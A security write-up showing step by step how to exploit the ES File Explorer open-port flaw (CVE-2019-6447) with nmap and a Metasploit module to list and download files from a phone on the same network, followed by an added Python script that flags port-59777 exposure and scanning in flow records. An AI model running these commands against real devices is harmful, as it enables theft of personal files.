ES File Explorer Open Port Vulnerability exploitation

Ravindu Thomas
Published in InfoSec Write-ups
4 min read, Aug 7, 2022


ES File Explorer (File Manager) is a full-featured manager for files (images, music, movies, documents, apps), for both local and networked use! With over 500 million users worldwide, ES File Explorer (File Manager) helps manage your Android phone and files efficiently and effectively, and share files without data cost.

In Jan. 2019, a security researcher disclosed a security vulnerability in ES File Explorer (CVE-2019-6447).

This works on version v4.1.9.7.4 and allows attackers on the same network to execute applications and read files and sensitive personal data. The application leaves TCP port 59777 open while it is running and responds to counterfeit requests over HTTP.

To perform this exploitation you need:

  1. Kali Linux or any other Linux distro
  2. msfconsole
  3. The target mobile must have ES File Explorer version 4.1.9.7.4 installed
  4. Both the attacker and the victim must be on the same network
  5. The app must also be running so that port 59777 remains open

Every time a user launches the app, an HTTP server is started. This server opens port 59777 on the device.

You can run nmap against the target to see whether the port is open:

nmap -p 59777 192.168.1.1
Figure 1

If you have trouble finding your IP, see the image above.

Start the Metasploit Framework:

msfconsole

Search for the es_file exploit:

msf6 > search es_file
Figure 2

Select the exploit module:

msf6 > use auxiliary/scanner/http/es_file_explorer_open_port

Run show options to check the available options:

msf6 > show options
Figure 3

You can see that the remote host (RHOSTS) isn’t specified, so set RHOSTS to your target mobile’s IP address:

msf6 > set RHOSTS 192.168.1.1
Figure 4

Now run the exploit:

msf6 > run
Figure 5

You can see the details of your mobile.

Run show actions to list all the available actions:

msf6 > show actions
Figure 6

Set the action to whatever you want to list; in this case I’ll set it to ‘LISTVIDEOS’:

msf6 > set action LISTVIDEOS
Figure 7

Now we are all set; give the run command:

msf6 > run
Figure 8

You can see all the audio files listed on my mobile.

Now, if you want, we can download any file.

You need to set the action to GETFILE:

msf6 > set action GETFILE
Figure 9

Then set ACTIONITEM to the path and filename you want to download, taken from the list you found in the previous step:

msf6 > set ACTIONITEM /pathto/123.mp3
Figure 10

Now run the exploit:

msf6 > run

That’s it, now you have successfully downloaded a file from the victim’s mobile!
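On the defender's side, the steps above show up on the network as TCP connections to port 59777 on the phone. The following is an added example, not part of the original article: it reads flow records and reports devices that accepted a connection on that port and sources that tried it on several hosts. The record format, the sample records and the function name `analyse` are constructed for illustration.

```python
import csv
from collections import defaultdict
from ipaddress import ip_address

ES_PORT = 59777  # TCP port the article says ES File Explorer leaves open

# Constructed sample flow records (assumed format, not from the article):
# time,src,dst,dport,proto,state
SAMPLE_FLOWS = """\
time,src,dst,dport,proto,state
2022-08-07T10:00:01,192.168.1.23,192.168.1.40,59777,tcp,ESTABLISHED
2022-08-07T10:00:02,192.168.1.23,192.168.1.41,59777,tcp,RST
2022-08-07T10:00:02,192.168.1.23,192.168.1.42,59777,tcp,RST
2022-08-07T10:00:09,192.168.1.23,192.168.1.40,59777,tcp,ESTABLISHED
2022-08-07T10:01:00,192.168.1.50,192.168.1.1,443,tcp,ESTABLISHED
2022-08-07T10:02:00,192.168.1.40,192.168.1.40,59777,tcp,ESTABLISHED
2022-08-07T10:03:00,192.168.1.60,192.168.1.40,59777,udp,NEW
"""

def analyse(flow_text, sweep_threshold=3):
    """Return (exposed, sweepers) for traffic to TCP port 59777.

    exposed:  {device: [peers that completed a connection to the port]}
    sweepers: {source: [targets]} for sources that tried the port on at
              least `sweep_threshold` distinct hosts
    """
    exposed, targets = defaultdict(set), defaultdict(set)
    for row in csv.reader(flow_text.splitlines()):
        if len(row) != 6:
            continue  # skip malformed lines
        _, src, dst, dport, proto, state = (f.strip() for f in row)
        if proto.lower() != "tcp" or dport != str(ES_PORT):
            continue  # also drops the header row
        if ip_address(src) == ip_address(dst):
            continue  # a device talking to itself is not network exposure
        targets[src].add(dst)
        if state.upper() == "ESTABLISHED":
            exposed[dst].add(src)  # the port answered: app is running here
    sweepers = {s: sorted(t) for s, t in targets.items()
                if len(t) >= sweep_threshold}
    return {d: sorted(p) for d, p in exposed.items()}, sweepers

if __name__ == "__main__":
    exposed, sweepers = analyse(SAMPLE_FLOWS)
    for dev, peers in exposed.items():
        print(f"{dev} accepted connections on tcp/{ES_PORT} from {peers}")
    for src, hit in sweepers.items():
        print(f"{src} tried tcp/{ES_PORT} on {len(hit)} hosts: {hit}")
```

A device that appears in the first result has the app running with the port reachable from other hosts on the network.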
